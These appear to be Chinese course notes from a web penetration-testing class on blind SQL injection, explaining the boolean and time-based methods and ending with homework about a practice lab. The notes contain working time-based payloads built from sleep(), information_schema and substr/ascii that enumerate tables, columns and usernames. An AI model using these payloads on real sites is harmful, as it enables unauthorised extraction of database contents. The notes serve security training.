一、课程名称order by注入&布尔%时间盲注
二、课程内容
盲注:什么是盲注:有时⽬标存在注⼊,但在⻚⾯上没有任何回显,此时,我们需要利⽤⼀些⽅法进⾏判断或者尝试得到数据,这个过程称之为盲注。
布尔盲注:很明显True和false,它只会根据你的注⼊信息返回True和False,也就没有了之前的报错信息。
时间盲注:界⾯返回值只有⼀种True,⽆论输⼊任何值,返回情况都会按照正常来处理。加⼊特定的时间函数,通过查看web⻚⾯返回的时间差来判断注⼊的语句是否正确
布尔盲注流程
判断注⼊点
判断闭合
判断⻓度
猜解库名、表名、列名、具体数据
延时盲注其实和布尔盲注其实没有什么太⼤的区别,只不过是⼀个依靠⻚⾯是否正常判断,⼀个是否延时判断,在操作上其实也差不多,只不过延时多⼀个if()
时间盲注:
猜有几张表
and if((select count(table_name) from information_schema.tables where table_schema=database())=5,sleep(5),3) --+
确定表名长度
and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(5),3)--+eee
确定表名
and if (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,sleep(5),3) --+eee
确定列名
and if (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=105,sleep(5),3) --+eee
确定内容
?id=1' and if (ascii(substr((select username from users limit 0,1),1,1))>1,sleep(5),3)--+
WEB渗透测试工程师系统班250303期 第15节课作业 1. 实际操作课堂讲解的yakit sql注入靶场,截图 2. 布尔盲注的原理是什么 根据注入信息只返回正确或错误 3. 时间盲注的原理是什么 注入信息输入后,没有反应,只能通过注入的返回时间确定
| 
